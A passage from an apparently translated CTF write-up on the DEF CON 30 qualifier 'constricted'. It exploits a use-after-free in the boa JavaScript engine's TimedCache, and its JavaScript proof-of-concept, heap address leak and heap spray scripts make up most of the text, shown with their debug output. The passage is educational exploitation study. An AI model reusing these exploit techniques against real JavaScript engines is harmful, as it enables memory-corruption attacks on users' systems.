class="title function_ invoke__">mark</span>(v);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>As you can see, this implementation diligently propagates trace into its child fields and introduces no externally mutable condition.</p><h2 id="五、漏洞利用">5. Exploitation</h2><h3 id="a-UAF">a. UAF</h3><p>During testing I accidentally triggered a panic with the following code:</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">tc = <span class="keyword">new</span> <span class="title class_">TimedCache</span>()</span><br><span class="line">tc.<span class="title function_">set</span>(<span class="string">&#x27;k&#x27;</span>, &#123;&#125;, <span class="number">0</span>) <span class="comment">// lifetime = 0 makes the timer expire immediately, so the JsObject is no longer marked</span></span><br><span class="line">[ctrl+D sends <span class="variable constant_">EOF</span>, garbage collection starts] <span class="comment">// panic!</span></span><br></pre></td></tr></table></figure><p>I then put together a version that triggers it reliably:</p><figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">tc = new <span class="title function_ invoke__">TimedCache</span>()</span><br><span class="line">tc.<span class="title function_ invoke__">set</span>(<span class="string">&#x27;k&#x27;</span>, &#123;&#125;, <span class="number">0</span>)</span><br><span class="line">tc = null</span><br><span class="line">console.<span class="title function_ invoke__">collectGarbage</span>() <span class="comment">// panic!</span></span><br></pre></td></tr></table></figure><p>The stack trace is long, but it is clearly related to the GC. Looking at the code, this panic exists to stop a <code>Gc&lt;_&gt;</code> <strong>from dereferencing the <code>GcBox&lt;_&gt;</code> pointer it holds during the sweep phase</strong>, because doing so leads to unexpected behavior and is unsafe.</p><p>The reason this code produces that kind of panic is the UAF. In the code above, the JS 
object <code>&#123;&#125;</code> lives in a <code>GcBox</code> that should have root=0, so normally execution <strong>would not enter</strong> the unsafe block. Because the memory has been freed, however, the value stored where the root field lives has changed, so <code>self.rooted()</code> returns true, execution enters the unsafe region, and the check there fires and causes the panic:</p><figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">impl</span>&lt;T: Trace + ?<span class="built_in">Sized</span>&gt; <span class="built_in">Drop</span> <span class="keyword">for</span> <span class="title class_">Gc</span>&lt;T&gt; &#123;</span><br><span class="line">    <span class="meta">#[inline]</span></span><br><span class="line">    <span class="keyword">fn</span> <span class="title function_">drop</span>(&amp;<span class="keyword">mut</span> <span class="keyword">self</span>) &#123;</span><br><span class="line">        <span class="comment">// If this pointer was a root, we should unroot it.</span></span><br><span class="line">        <span class="keyword">if</span> <span class="keyword">self</span>.<span class="title function_ invoke__">rooted</span>() &#123;</span><br><span class="line">            <span class="comment">// this branch should not be taken</span></span><br><span class="line">            <span class="keyword">unsafe</span> &#123;</span><br><span class="line">                <span class="keyword">self</span>.<span class="title function_ invoke__">inner</span>().<span class="title function_ invoke__">unroot_inner</span>();</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span 
class="line">&#125;</span><br></pre></td></tr></table></figure><p>With everything studied so far, I tried to build the following POC along these lines:</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// console wrapper</span></span><br><span class="line"><span class="keyword">let</span> <span class="title function_">log</span> = (<span class="params">x</span>) =&gt; &#123; <span class="variable language_">console</span>.<span class="title function_">log</span>(x) &#125;;</span><br><span class="line"><span class="keyword">let</span> <span class="title function_">debug</span> = (<span class="params">x</span>) =&gt; &#123; <span class="title function_">log</span>(<span class="variable language_">console</span>.<span class="title function_">debug</span>(x)) &#125;;</span><br><span class="line"><span class="keyword">let</span> <span class="title function_">gc</span> = (<span class="params"></span>) =&gt; <span class="variable language_">console</span>.<span class="title function_">collectGarbage</span>();</span><br><span class="line"><span class="keyword">let</span> <span class="title function_">sleep</span> = (<span class="params">x</span>) =&gt; <span class="variable language_">console</span>.<span class="title function_">sleep</span>(x);</span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> fake_timeout = &#123; <span class="title function_">valueOf</span>(<span 
class="params"></span>) &#123;</span><br><span class="line">    <span class="title function_">log</span>(<span class="string">&quot;[+] fake_timeout called&quot;</span>);</span><br><span class="line">    <span class="title function_">sleep</span>(<span class="number">2000</span>);</span><br><span class="line">    <span class="title function_">gc</span>();</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>; </span><br><span class="line">&#125;&#125;;</span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> cache = <span class="keyword">new</span> <span class="title class_">TimedCache</span>();</span><br><span class="line">cache.<span class="title function_">set</span>(<span class="string">&#x27;key&#x27;</span>, <span class="keyword">new</span> <span class="title class_">ArrayBuffer</span>(<span class="number">1024</span>), <span class="number">1000</span>);</span><br><span class="line"><span class="keyword">let</span> uaf_obj = cache.<span class="title function_">get</span>(<span class="string">&quot;key&quot;</span>, fake_timeout);</span><br><span class="line"><span class="title function_">debug</span>(uaf_obj);</span><br></pre></td></tr></table></figure><p>The final debug call prints a JsObject, as expected:</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">JsValue @0x75870461d090</span><br><span class="line">Object @0x7587046c08a8</span><br><span class="line">- Methods @0x758704609310</span><br><span class="line">- Array Buffer Data @0x7587046d8000</span><br></pre></td></tr></table></figure><h3 id="b-leak-heap">b. 
leak heap</h3><p>Next we need to figure out how to leak useful addresses. A first attempt is to print the data in the heap chunk after it has been freed:</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// tools wrapper</span></span><br><span class="line"><span class="keyword">let</span> <span class="title function_">log</span> = (<span class="params">x</span>) =&gt; &#123; <span class="variable language_">console</span>.<span class="title function_">log</span>(x) &#125;;</span><br><span class="line"><span class="keyword">let</span> <span class="title function_">debug</span> = (<span class="params">x</span>) =&gt; &#123; <span class="title function_">log</span>(<span class="variable language_">console</span>.<span class="title function_">debug</span>(x)) &#125;;</span><br><span 
class="line"><span class="keyword">let</span> <span class="title function_">gc</span> = (<span class="params"></span>) =&gt; <span class="variable language_">console</span>.<span class="title function_">collectGarbage</span>();</span><br><span class="line"><span class="keyword">let</span> <span class="title function_">bp</span> = (<span class="params"></span>) =&gt; <span class="variable language_">console</span>.<span class="title function_">sysbreak</span>();</span><br><span class="line"><span class="keyword">let</span> <span class="title function_">sleep</span> = (<span class="params">x</span>) =&gt; <span class="variable language_">console</span>.<span class="title function_">sleep</span>(x);</span><br><span class="line"><span class="keyword">let</span> <span class="title function_">hex</span> = (<span class="params">x</span>) =&gt; (<span class="string">&quot;0x&quot;</span> + x.<span class="title function_">toString</span>(<span class="number">16</span>));</span><br><span class="line"></span><br><span class="line"><span class="comment">// parse</span></span><br><span class="line"><span class="comment">// let get_js_value = (obj) =&gt; </span></span><br><span class="line"><span class="comment">//     Number.parseInt(console.debug(obj).split(&quot;JsValue @&quot;)[1].split(&quot;\n&quot;)[0]);</span></span><br><span class="line"><span class="keyword">let</span> <span class="title function_">get_obj_addr</span> = (<span class="params">obj</span>) =&gt; </span><br><span class="line">    <span class="title class_">Number</span>.<span class="built_in">parseInt</span>(<span class="variable language_">console</span>.<span class="title function_">debug</span>(obj).<span class="title function_">split</span>(<span class="string">&quot;Object @&quot;</span>)[<span class="number">1</span>].<span class="title function_">split</span>(<span class="string">&quot;\n&quot;</span>)[<span class="number">0</span>]);</span><br><span class="line"><span class="keyword">let</span> 
<span class="title function_">get_method_addr</span> = (<span class="params">obj</span>) =&gt; </span><br><span class="line">    <span class="title class_">Number</span>.<span class="built_in">parseInt</span>(<span class="variable language_">console</span>.<span class="title function_">debug</span>(obj).<span class="title function_">split</span>(<span class="string">&quot;Methods @&quot;</span>)[<span class="number">1</span>].<span class="title function_">split</span>(<span class="string">&quot;\n&quot;</span>)[<span class="number">0</span>]);</span><br><span class="line"><span class="keyword">let</span> <span class="title function_">get_buffer_data_addr</span> = (<span class="params">obj</span>) =&gt; </span><br><span class="line">    <span class="title class_">Number</span>.<span class="built_in">parseInt</span>(<span class="variable language_">console</span>.<span class="title function_">debug</span>(obj).<span class="title function_">split</span>(<span class="string">&quot;Buffer Data @&quot;</span>)[<span class="number">1</span>].<span class="title function_">split</span>(<span class="string">&quot;\n&quot;</span>)[<span class="number">0</span>]);</span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> spray_obj = [];</span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> fake_timeout = &#123; <span class="title function_">valueOf</span>(<span class="params"></span>) &#123;</span><br><span class="line">    <span class="title function_">log</span>(<span class="string">&quot;[+] fake_timeout called&quot;</span>);</span><br><span class="line">    <span class="title function_">sleep</span>(<span class="number">2000</span>);</span><br><span class="line">    <span class="title function_">gc</span>();</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>; </span><br><span class="line">&#125;&#125;;</span><br><span 
class="line"></span><br><span class="line"><span class="keyword">let</span> cache = <span class="keyword">new</span> <span class="title class_">TimedCache</span>();</span><br><span class="line">cache.<span class="title function_">set</span>(<span class="string">&#x27;key&#x27;</span>, <span class="keyword">new</span> <span class="title class_">Uint32Array</span>(<span class="number">20</span>), <span class="number">1000</span>);</span><br><span class="line"><span class="keyword">let</span> uaf_obj = cache.<span class="title function_">get</span>(<span class="string">&quot;key&quot;</span>, fake_timeout);</span><br><span class="line"></span><br><span class="line"><span class="title function_">debug</span>(uaf_obj);</span><br><span class="line"><span class="title function_">log</span>(uaf_obj.<span class="property">length</span>)</span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; uaf_obj.<span class="property">length</span>; ++i) &#123;</span><br><span class="line">    <span class="title function_">log</span>(i + <span class="string">&quot; =&gt; &quot;</span> + uaf_obj[i]);</span><br><span class="line">&#125;</span><br><span class="line"><span class="title function_">bp</span>();</span><br></pre></td></tr></table></figure><p>Output:</p><figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span 
class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">[+] fake_timeout called</span><br><span class="line">JsValue @<span class="number">0x72d3b041d090</span></span><br><span class="line">Object @<span class="number">0x72d3b04e7c28</span></span><br><span class="line">- Methods @<span class="number">0x72d3b0409460</span></span><br><span class="line"></span><br><span class="line"><span class="number">20</span></span><br><span class="line"><span class="number">0</span> =&gt; <span class="number">0</span></span><br><span class="line"><span class="number">1</span> =&gt; <span class="number">0</span></span><br><span class="line"><span class="number">2</span> =&gt; <span class="number">2957263088</span></span><br><span class="line"><span class="number">3</span> =&gt; <span class="number">29395</span></span><br><span class="line"><span class="number">4</span> =&gt; <span class="number">152870256</span></span><br><span class="line"><span class="number">5</span> =&gt; <span class="number">0</span></span><br><span class="line"><span class="number">6</span> =&gt; <span class="number">0</span></span><br><span class="line"><span class="number">7</span> =&gt; <span class="number">0</span></span><br><span class="line"><span class="number">8</span> =&gt; <span class="number">0</span></span><br><span class="line"><span class="number">9</span> =&gt; <span class="number">0</span></span><br><span class="line"><span class="number">10</span> =&gt; <span class="number">2957103232</span></span><br><span class="line"><span class="number">11</span> =&gt; <span class="number">29395</span></span><br><span class="line"><span class="number">12</span> =&gt; <span class="number">1</span></span><br><span class="line"><span class="number">13</span> =&gt; 
<span class="number">0</span></span><br><span class="line"><span class="number">14</span> =&gt; <span class="number">1</span></span><br><span class="line"><span class="number">15</span> =&gt; <span class="number">0</span></span><br><span class="line"><span class="number">16</span> =&gt; <span class="number">4282195719</span></span><br><span class="line"><span class="number">17</span> =&gt; <span class="number">32767</span></span><br><span class="line"><span class="number">18</span> =&gt; <span class="number">2957250560</span></span><br><span class="line"><span class="number">19</span> =&gt; <span class="number">29395</span></span><br></pre></td></tr></table></figure><p>The output contains two kinds of number pairs. Each pair holds one large and one small value, and combining the two yields a valid memory address:</p><ul><li><p><code>uaf_obj[3] * 0x100000000 + uaf_obj[2] == 0x72d3b04440f0</code>:</p><p><img src="/2022/08/defcon30quals_constricted/image-20220827091210675.png" alt="image-20220827091210675"></p><p>This memory is managed by Rust itself. As long as the exploit is unchanged, the offset of this address from the start of its segment stays at roughly <code>0x4440f0</code>.</p></li><li><p><code>uaf_obj[17] * 0x100000000 + uaf_obj[16] == 0x7fffff3d1f07</code>, at relative offset <code>0x1f07</code>:</p><p><img src="/2022/08/defcon30quals_constricted/image-20220827092216977.png" alt="image-20220827092216977"></p></li></ul><blockquote><p>Note: the array stored in the TimedCache has length 20. A longer or shorter array fails to pick up any meaningful pointers.</p></blockquote><p>This gives us the base addresses of both segments. Interestingly, the segment sandwiched between them is exactly the memory allocated by <strong>the mmap call that a ctor performs before main runs</strong>, and its length changes every time the program restarts (because of getrandom):</p><blockquote><p>Note that the program was debugged across several runs, so addresses do not match between screenshots (for example, the addresses in the screenshot above do not map onto the one below).</p></blockquote><p><img src="/2022/08/defcon30quals_constricted/image-20220827095505733.png" alt="image-20220827095505733"></p><p>Of the two segments, the larger one at the lower address is the heap memory managed by Rust, which holds many objects created by Rust. Take care to distinguish it from heap.</p><h3 id="c-spray">c. 
spray</h3><p>During the heap spray, the <strong>backing store</strong> of an <strong>array object</strong> must be allocated into <strong>the memory hole left by the freed JsObject's Object struct</strong>. We can then rewrite the UAF JsObject's Object struct through the array object and <strong>construct a fake object</strong>.</p><p>In JS engine exploitation, a Typed Array plus an ArrayBuffer is the usual way to reclaim freed memory. Because boa prints the data pointer of an ArrayBuffer, and BigUint64 lets later writes go to memory <strong>in eight-byte units</strong>, we use an ArrayBuffer to occupy the memory and a BigUint64Array to interpret the ArrayBuffer.</p><p>Two questions need answering first. Since we want to reclaim the UAF object:</p><ol><li>How do we determine the size of the UAF object?</li><li>What makes a good UAF object?</li></ol><p>Start with the first question. It is hard to read a struct's size directly from the Rust code, and we also do not know how long the chunk metadata is when Rust allocates heap memory (or even whether chunks carry metadata at all). We can, however, infer it by <strong>repeatedly creating variables of the same type and printing their pointers</strong>. For example:</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">let</span> spray_objs = [];</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; <span class="number">10</span>; i++) &#123;</span><br><span class="line">    <span class="keyword">let</span> obj = <span class="keyword">new</span> <span class="title class_">ArrayBuffer</span>(<span class="number">0x100</span>); <span class="comment">// alloc</span></span><br><span class="line">    <span class="title function_">debug</span>(obj);  <span class="comment">// output</span></span><br><span class="line">    <span class="title function_">log</span>(<span class="string">&quot;&quot;</span>) <span class="comment">// new line</span></span><br><span class="line">    spray_objs.<span class="title function_">push</span>(obj);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Look at the spacing between the Object pointers in the output:</p><figure class="highlight text"><table><tr><td 
class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">JsValue @0x729fbc61d260</span><br><span class="line">Object @0x729fbc6e8b28</span><br><span class="line">- Methods @0x729fbc609310</span><br><span class="line">- Array Buffer Data @0x729fbc61e800</span><br><span class="line"></span><br><span class="line">JsValue @0x729fbc61d2a0</span><br><span class="line">Object @0x729fbc6e8ca8</span><br><span class="line">- Methods @0x729fbc609310</span><br><span class="line">- Array Buffer Data @0x729fbc61e900</span><br><span class="line"></span><br><span class="line">JsValue @0x729fbc61d2e0</span><br><span class="line">Object @0x729fbc6e8e28</span><br><span class="line">- Methods @0x729fbc609310</span><br><span class="line">- Array Buffer Data @0x729fbc61ea00</span><br></pre></td></tr></table></figure><p>This shows that for a JsObject of type <code>ArrayBuffer</code>, the <code>Object</code> struct occupies 0x180 bytes of memory (including chunk metadata, here and below). It is the following struct:</p><figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">pub</span> <span class="keyword">struct</span> <span class="title class_">Object</span> 
&#123;</span><br><span class="line">    <span class="comment">/// The type of the object.</span></span><br><span class="line">    <span class="keyword">pub</span> data: ObjectData,</span><br><span class="line">    <span class="comment">/// The collection of properties contained in the object</span></span><br><span class="line">    properties: PropertyMap,</span><br><span class="line">    <span class="comment">/// Instance prototype `__proto__`.</span></span><br><span class="line">    prototype: JsPrototype,</span><br><span class="line">    <span class="comment">/// Whether it can have new properties added to it.</span></span><br><span class="line">    extensible: <span class="type">bool</span>,</span><br><span class="line">    <span class="comment">/// The `[[PrivateElements]]` internal slot.</span></span><br><span class="line">    private_elements: FxHashMap&lt;Sym, PrivateElement&gt;,</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>This makes it fairly easy to find the exact memory footprint of a given JS type.</p><p>Now the second question. When an ArrayBuffer is allocated during the spray, boa allocates both the ArrayBuffer object (0x180 bytes) and the backing store (user-specified size, aligned). We naturally want the <strong>backing store</strong> to take the UAF memory, rather than the ArrayBuffer object that is allocated alongside it. The UAF object therefore must not be 0x180 bytes in size.</p><p>Building an object that is not 0x180 bytes is easy. The Object struct of the empty object <code>&#123;&#125;</code> is already <code>0x180</code> bytes, so any nested object such as <code>&#123;a:&#123;&#125;&#125;</code> ends up with an Object struct of <code>0x300</code> bytes. The more complex the structure, the larger the <code>Object</code> struct becomes.</p><p>Now let's try the spray in practice:</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span 
class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// tools wrapper</span></span><br><span class="line"><span class="keyword">let</span> <span class="title function_">log</span> = (<span class="params">x</span>) =&gt; &#123; <span class="variable language_">console</span>.<span class="title function_">log</span>(x) &#125;;</span><br><span class="line"><span class="keyword">let</span> <span class="title function_">debug</span> = (<span class="params">x</span>) =&gt; &#123; <span class="title function_">log</span>(<span class="variable language_">console</span>.<span class="title function_">debug</span>(x)) &#125;;</span><br><span class="line"><span class="keyword">let</span> <span class="title function_">gc</span> = (<span class="params"></span>) =&gt; <span class="variable language_">console</span>.<span class="title function_">collectGarbage</span>();</span><br><span class="line"><span class="keyword">let</span> <span class="title function_">bp</span> = (<span class="params"></span>) =&gt; <span 
class="variable language_">console</span>.<span class="title function_">sysbreak</span>();</span><br><span class="line"><span class="keyword">let</span> <span class="title function_">sleep</span> = (<span class="params">x</span>) =&gt; <span class="variable language_">console</span>.<span class="title function_">sleep</span>(x);</span><br><span class="line"><span class="keyword">let</span> <span class="title function_">hex</span> = (<span class="params">x</span>) =&gt; (<span class="string">&quot;0x&quot;</span> + x.<span class="title function_">toString</span>(<span class="number">16</span>));</span><br><span class="line"></span><br><span class="line"><span class="comment">// parse tools</span></span><br><span class="line"><span class="comment">// let get_js_value = (obj) =&gt; </span></span><br><span class="line"><span class="comment">//     Number.parseInt(console.debug(obj).split(&quot;JsValue @&quot;)[1].split(&quot;\n&quot;)[0]);</span></span><br><span class="line"><span class="keyword">let</span> <span class="title function_">get_obj_addr</span> = (<span class="params">obj</span>) =&gt; </span><br><span class="line">    <span class="title class_">Number</span>.<span class="built_in">parseInt</span>(<span class="variable language_">console</span>.<span class="title function_">debug</span>(obj).<span class="title function_">split</span>(<span class="string">&quot;Object @&quot;</span>)[<span class="number">1</span>].<span class="title function_">split</span>(<span class="string">&quot;\n&quot;</span>)[<span class="number">0</span>]);</span><br><span class="line"><span class="keyword">let</span> <span class="title function_">get_method_addr</span> = (<span class="params">obj</span>) =&gt; </span><br><span class="line">    <span class="title class_">Number</span>.<span class="built_in">parseInt</span>(<span class="variable language_">console</span>.<span class="title function_">debug</span>(obj).<span class="title function_">split</span>(<span 
class="string">&quot;Methods @&quot;</span>)[<span class="number">1</span>].<span class="title function_">split</span>(<span class="string">&quot;\n&quot;</span>)[<span class="number">0</span>]);</span><br><span class="line"><span class="keyword">let</span> <span class="title function_">get_buffer_data_addr</span> = (<span class="params">obj</span>) =&gt; </span><br><span class="line">    <span class="title class_">Number</span>.<span class="built_in">parseInt</span>(<span class="variable language_">console</span>.<span class="title function_">debug</span>(obj).<span class="title function_">split</span>(<span class="string">&quot;Buffer Data @&quot;</span>)[<span class="number">1</span>].<span class="title function_">split</span>(<span class="string">&quot;\n&quot;</span>)[<span class="number">0</span>]);</span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> fake_timeout = &#123; <span class="title function_">valueOf</span>(<span class="params"></span>) &#123;</span><br><span class="line">    <span class="title function_">log</span>(<span class="string">&quot;[+] fake_timeout called&quot;</span>);</span><br><span class="line">    <span class="title function_">sleep</span>(<span class="number">2000</span>);</span><br><span class="line">    <span class="title function_">gc</span>();</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>; </span><br><span class="line">&#125;&#125;;</span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> new_cache = <span class="keyword">new</span> <span class="title class_">TimedCache</span>();</span><br><span class="line">new_cache.<span class="title function_">set</span>(<span class="string">&#x27;spray&#x27;</span>, &#123;<span class="attr">a</span>:&#123;&#125;&#125;, <span class="number">1000</span>);</span><br><span class="line"><span class="keyword">let</span> new_uaf_obj = 
new_cache.<span class="title function_">get</span>(<span class="string">&quot;spray&quot;</span>, fake_timeout);</span><br><span class="line"><span class="title function_">debug</span>(new_uaf_obj)</span><br><span class="line"><span class="title function_">log</span>(<span class="string">&quot;&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">// let spray_obj = null;</span></span><br><span class="line"><span class="keyword">let</span> spray_objs = [];</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; <span class="number">10</span>; i++) &#123;</span><br><span class="line">    <span class="keyword">let</span> obj = <span class="keyword">new</span> <span class="title class_">ArrayBuffer</span>(<span class="number">0x300</span>);</span><br><span class="line">    <span class="title function_">debug</span>(obj);</span><br><span class="line">    <span class="title function_">log</span>(<span class="string">&quot;&quot;</span>)</span><br><span class="line">    spray_objs.<span class="title function_">push</span>(obj);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="title function_">bp</span>();</span><br></pre></td></tr></table></figure><p>Output:</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span 
class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">JsValue @0x7a7ecde1d090</span><br><span class="line">Object @0x7a7ecdee7aa8      // &lt;----- 1</span><br><span class="line">- Methods @0x7a7ecde09310</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">JsValue @0x7a7ecde1d0e0</span><br><span class="line">Object @0x7a7ecdee7aa8      // &lt;----- 2</span><br><span class="line">- Methods @0x7a7ecde09310</span><br><span class="line">- Array Buffer Data @0x7a7ecdec6000</span><br><span class="line"></span><br><span class="line">JsValue @0x7a7ecde1d120</span><br><span class="line">Object @0x7a7ecdee80a8</span><br><span class="line">- Methods @0x7a7ecde09310</span><br><span class="line">- Array Buffer Data @0x7a7ecdec6300</span><br><span class="line"></span><br><span class="line">JsValue @0x7a7ecde1d160</span><br><span class="line">Object @0x7a7ecdee8228</span><br><span class="line">- Methods @0x7a7ecde09310</span><br><span class="line">- Array Buffer Data @0x7a7ecdec6600</span><br><span class="line">...</span><br></pre></td></tr></table></figure><p>Awkward: the memory hole was taken by the ArrayBuffer's Object instead. A rough guess is that Rust's allocation strategy is first-fit: when allocating 0x180 bytes it found a 0x300 chunk that could be split, and took it.</p><p>After some struggling, the allocation finally landed where we wanted:</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// ...</span></span><br><span class="line"><span class="keyword">let</span> new_cache = <span class="keyword">new</span> <span 
class="title class_">TimedCache</span>();</span><br><span class="line">new_cache.<span class="title function_">set</span>(<span class="string">&#x27;spray&#x27;</span>, &#123;<span class="attr">a</span>:&#123;&#125;,<span class="attr">b</span>:&#123;&#125;&#125;, <span class="number">1000</span>);</span><br><span class="line"><span class="keyword">let</span> new_uaf_obj = new_cache.<span class="title function_">get</span>(<span class="string">&quot;spray&quot;</span>, fake_timeout);</span><br><span class="line"><span class="title function_">debug</span>(new_uaf_obj)</span><br><span class="line"><span class="title function_">log</span>(<span class="string">&quot;&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> spray_objs = [];</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; <span class="number">10</span>; i++) &#123;</span><br><span class="line">    <span class="keyword">let</span> obj = <span class="keyword">new</span> <span class="title class_">ArrayBuffer</span>(<span class="number">0x180</span>);</span><br><span class="line">    <span class="title function_">debug</span>(obj);</span><br><span class="line">    <span class="title function_">log</span>(<span class="string">&quot;&quot;</span>)</span><br><span class="line">    spray_objs.<span class="title function_">push</span>(obj);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Output:</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">JsValue @0x73dcb281d0c0</span><br><span class="line">Object @0x73dcb28e8228     &lt;----- 1</span><br><span class="line">- Methods @0x73dcb2809310</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">JsValue @0x73dcb281d0a0</span><br><span class="line">Object 